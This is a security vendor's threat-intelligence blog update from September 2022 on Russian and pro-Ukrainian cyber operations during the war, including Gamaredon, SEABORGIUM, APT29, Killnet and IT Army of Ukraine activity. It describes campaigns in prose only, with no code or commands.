Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 450 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
September 29, 2022
As the Russian and Ukrainian war continues, cybercriminals in support of both sides continue to target organizations to obtain sensitive data, disrupt operations and wreak havoc. What’s more, Russia has used the conflict to move their targeting beyond Ukraine.
This war has had a rippling effect across the world, including a cybercriminal landscape that’s also been affected as groups split, turn sides and announce support for one country or the other. Since the invasion began, Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian and Ukrainian military actions and estimated cyber-related implications in advisories and blog posts on February 4, February 22, February 24, June 30 and August 25. In this update, we’ll provide information on the events of the previous 30 days and what to expect looking forward.
Russia has consistently targeted Ukraine in cyberattacks since well before the physical invasion in February 2022. One infamous attack targeted Ukraine’s power grid on December 23, 2015. Attackers were able to take control of the facilities’ SCADA systems. During the attack, malicious actors opened breakers at 30 distribution substations causing more than 200,000 consumers to lose power.1 Since the invasion of Ukraine, Russia’s cyberattacks against Ukraine have increased significantly, as have Russian supporters, including both state-supported and cybercriminal groups that have pledged their allegiance to the Kremlin.
In August 2022, The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyberespionage campaign conducted by the Russia-linked Gamaredon APT group (aka Shuckworm, Primitive Bear, Armageddon). The group has been observed targeting Ukrainian entities with a PowerShell info-stealer malware dubbed GammaLoad. This campaign is reported to have started on July 15, and was detected as recently as August 8, 2022. The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser. Then the attackers used mshta.exe to download an XML file, which was likely masquerading as an HTML application file (See Table 1 below). Following the downloading of the XML file onto victim networks, the attackers executed a PowerShell stealer. In some of the cases, the attackers also delivered two backdoors named Giddome and Pterodo, which are known to be used by the Gamaredon group.2
In August 2022, the Microsoft Threat Intelligence Center (MSTIC) observed and took actions to disrupt campaigns launched by the Russia-linked APT group SEABORGIUM. SEABORGIUM is a highly persistent threat actor that targets the same organizations over long periods of time using constant impersonation, rapport building and phishing to slowly deepen their intrusion. SEABORGIUM intrusions have been linked to hacking and leak campaigns where stolen and leaked data is used to shape narratives in targeted countries. Since the beginning of 2022, MSTIC has observed SEABORGIUM campaigns targeting over 30 organizations in NATO countries, particularly the U.S., U.K. and the government sector of Ukraine. SEABORGIUM primarily focuses operations on defense and intelligence consulting companies, non-governmental and intergovernmental organizations, think tanks and higher education.
SEABORGIUM conducts reconnaissance on their target individuals before beginning a campaign and focuses on identifying legitimate contacts in the target’s social network. The threat actors Likely leverage social media platforms, personal directories and open-source intelligence (OSINT) to identify targets’ contacts that can be used for impersonation. Once the group has a contact, they create an email address that matches the contact and sends a phishing email. If the target is a personal or consumer target, the threat actor typically begins with a benign email that includes pleasantries, Likely to establish rapport and avoid suspicion. When the victim is an organization, the emails appear to have a more authoritative approach. The goal of these campaigns is to steal sensitive information and harvest credentials.
In August 2022, Mandiant reported that the Russia-linked group APT29 (aka Cozy Bear) has been vigorously targeting Microsoft 365 accounts in NATO countries and attempting to access foreign policy information. Victims have included accounts that APT29 compromised months or even years before. APT29 used multiple new techniques during these attacks:
In August 2022, Latvia’s Computer Emergency Response Team (CERT.LV) reported that their website was suffering a massive DDoS attack. Latvia attributed the attack to the Russia-linked hacker group Killnet, after Latvia’s parliament announced Russia as a “state sponsor of terrorism.” In May 2022, Killnet declared war against any country that allied with Ukraine during the war, which has included the U.S., the U.K., Germany, Italy, Latvia, Romania, Lithuania, Estonia and Poland. These countries have been targeted each time they announce support for Ukraine, with Latvia and Lithuania targeted the most often. Latvia’s head of CERT.LV stated that Latvia is attacked by hackers almost on a daily basis with around 1,000 targets on some days.5 Finland’s parliament was also targeted by Russia-linked hackers, a group called NoName057(16), in August 2022. The hackers stated on their Telegram channel that they “punished” Finland for its aspiration to join NATO. The cyberattack on Finland’s parliament occurred on the same day U.S. President Joe Biden announced his support for Finland and Sweden to join NATO.6
There are multiple threat groups, including the IT Army of Ukraine and Anonymous, that have pledged their allegiance to helping Ukraine in the cyberwar that has ensued. These groups are comprised of threat actors from all areas of the world that have come together to support the country. The IT Army of Ukraine was created on February 26, 2022, after the ground invasion of Ukraine and is comprised of more than 1,000 Ukrainian and foreign volunteers. Additionally, after the invasion of Ukraine, the Anonymous hacking group posted on their Twitter for hackers around the world to target Russia, effectively declaring war on Russia in an operation dubbed #OpRussia.
In August 2022, Ukrainian hackers hacked the TV shown in Russian-occupied Crimea and broadcasted an address by President Volodymyr Zelenskyy. The address was broadcast on Russia’s Pervyi Kanal (Channel One).7
In August 2022, the Anonymous hacking group announced via Twitter that two Russian video conferencing services were under attack. The group announced that all services were down. The first, Webinar Group, is used for meetings, online events, training and webinars throughout Russia. The second, Videomost, is another of the top video conferencing apps used throughout Russia for meetings, trainings and online events.
On September 06, 2022, Anonymous TV (@YourAnonTV) posted on their Twitter that the IT Army of Ukraine successfully targeted the third largest bank in the Russian Federation, GazpromBank, with a purported DDoS attack. The post stated that the website was down for four hours, making it impossible to send payments and transfers and blocking access to personal accounts and mobile banking. The post included two screenshots that showed the application as unavailable.8
In September 2022, the IT Army of Ukraine targeted the Yandex Taxi app causing a major traffic back up in Moscow. The group ordered all available taxis to the same location in Moscow, creating a traffic jam that took place in the center of the Russian city on September 01, 2022. Due to the hack, one of the main streets of Moscow was completely blocked for more than two hours. The Yandex-owned company stated that the security department immediately blocked the intruder and halted the fake taxi requests.9 This incident highlights how even high-level (low-complexity, simple) cyberattacks can result in real-world economic and social disruptions and impact.
In August 2022, the Russian streaming company, START, confirmed that the personal information of its customers was leaked during a cyberattack. The company did not disclose how many customers were affected, but the incident was listed on the Russian Telegram channel, Information Leaks, which stated the information included 72GB of data for 44 million customers. The leaked information included usernames, email addresses, hashed passwords, IP addresses, country of registration, subscription start and end date and the last login to the service. The breach purportedly affects viewers from Russia, Kazakhstan, China and Ukraine. The hacking group announced that the data came from an exposed MongoDB database program. START announced they fixed the vulnerability that allowed the data breach to occur.10
In August 2022, a forum specializing in cyberattacks against Russia and Belarus, DUMPS, appeared and was observed advertising DDoS attacks starting at $80 per hour. The forum only targets organizations in Russia and Belarus and does not offer any services for other countries. The activity centers around data leaks, advertising DDoS attack services, forged and stolen identity documents, and anonymous and bulletproof hosting services. The data-leaks section of the forum appears to be the largest, where users shared data stolen from Russia-based government and private institutions. DUMPS offers prices based on the power of the DDoS attack on offer, with a lower level “layer four” assault lasting one day priced at $500 and a higher “level seven” attack over one day priced at $600. Shorter attacks are offered by the hour. DUMPS appears to support their Ukrainian users while attracting Russian users that are willing to take up cyber-arms against their own country. The site has yet to gain much notoriety, with just 100 users; but could grow significantly if the site gains attention.
In September 2022, unknown hackers reportedly started flooding Cobalt Strike servers operated by former members of the Conti ransomware group with anti-Russian messages to disrupt their activity. Although the Conti ransomware group turned off their internal infrastructure in May 2022, their members shifted to other ransomware groups, such as Quantum, Hive and Alphv. The former Conti members have continued to use the same Cobalt Strike infrastructure to conduct new attacks under the other ransomware operations. The threat actor flooding the servers are using the username “Stop Putin!” on multiple computers and changing their computer names to various messages – “Stop the war!”, “15000+ dead Russian soldiers!”, and “Be a Russian patriot!”. The messages are flooding the servers at a rate or about two every second. The messages cause the TeamServer’s Java application to be overloaded and the activity was disrupted similar to a DoS condition. The threat actors are unknown, however, they have been observed resuming the flooding each time a new server believed to be connected to the former Conti members is identified.11
In September 2022, the Cyber Department of the Ukrainian Security Service (SSU) dismantled two bot farms that spread Russian disinformation on social networks and messaging platforms via thousands of fake accounts. The bot army was comprised of nearly 7,000 accounts and was used to push content discrediting the defense forces of Ukraine, justify Russia’s armed aggression and destabilize Ukraine’s social and political situation. One of the farms was operated by a 24-year-old native living in the Kyiv region and was used by “representatives of the PR departments of political parties and Russian citizens promoting destructive and provocative material in Ukrainian information space.” The second farm was operated by a user from Odessa and spread panic in the region by pushing disinformation and fake news from the front, selling its services to Russian “clients.” Ukraine has dismantled farms comprising of more than one million bots since the beginning of the war in February 2022.12
In September 2022, it was reported that the Ukrainian military made advances which led to Russia Likely ordering the withdrawal of its troops of occupied Kharkiv Oblast west of the Oskil River. Additionally, it was reported that in the south, near Kherson, Russia was Likely struggling to bring sufficient reserves forward across the Dnipro River to the front line. The Ukrainian success reported over the previous 30 days will Likely have significant implications for Russia’s overall operations on the ground. Due to this factor, it is Likely that Russia-based and supporting threat groups will increase their attacks on Ukrainian government and military organizations, as well as those of countries in support of Russia over the next 30 days.13
Along with the physical conflict in Russia’s invasion of Ukraine, it’s Likely that cyber adversaries, regardless of attribution, will continue to leverage and employ techniques, tools and vulnerabilities used in previous cyberattacks and campaigns. Threat actors are Likely to target known vulnerabilities, including older (2+ years) vulnerabilities, in widely used software and services to gain access to victim networks. This is Likely due to the success of compromise in employing the same techniques and utilizing minimal resources by reusing open-source and commercially available tools, software and malware.
In addition to multiple vulnerabilities, Optiv’s gTIC assesses it is Likely that cybercriminals and fringe state-sponsored campaigns will use common software and malware in the coming months, such as:
Table 1: Commonly observed MITRE ATT&CK tactics
It’s Likely that the U.S. and other Western Coalition countries will remain attractive targets for Russia-based threat actors for financial gain and espionage attacks. It’s Likely that if the United States imposes harsher and broader sanctions and embargos on Russia, the fallout will result in nearly all ransomware groups being placed under severe restrictions through the U.S. Treasury’s Office of Foreign Asset Control (OFAC). This would result in the inability of ransomware victims in the U.S. to consider negotiations and payments in exchange for preventing data leaks and retrieving decryption keys for compromised files and systems. Other countries that have a history of state-sponsored and/or APT attacks which have indirectly aligned or maintained suspicious neutrality towards Russia include China and India, which could also pose additional risks or proxies for cyberattacks.
When Russia invaded Ukraine, U.S.-based organizations began pulling their businesses from Russia. Multiple ransomware groups, including REvil, Conti and LockBit 2.0/3.0, are based in Russia and target multiple U.S.-based organizations daily. The sophistication and technical knowledge of the ransomware groups, the NotPetya attacks and nation-state groups – such as APT28, APT29 and Sandworm – highlight Russia’s ability to create severe disruption and chaos in the United States. U.S.-based organizations are a historically attractive target and it’s Likely that U.S. companies will continue to be targeted, whether by threat actors based in Russia or those in support of the Kremlin’s invasion of Ukraine.
Optiv Security: Secure greatness.™
Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.
February 23, 2022
This advisory from Optiv’s gTIC covers recent incidents related to Russian military operations in Ukraine and provides cybersecurity recommendations.
This advisory outlines the steps Optiv is taking in response to Russia’s invasion of Ukraine and offers counsel for our clients and partners.
February 10, 2022
This advisory offers recommendations for organizations potentially affected by Russian state-sponsored activity in Ukraine.
Let us know what you need, and we will have an Optiv professional contact you shortly.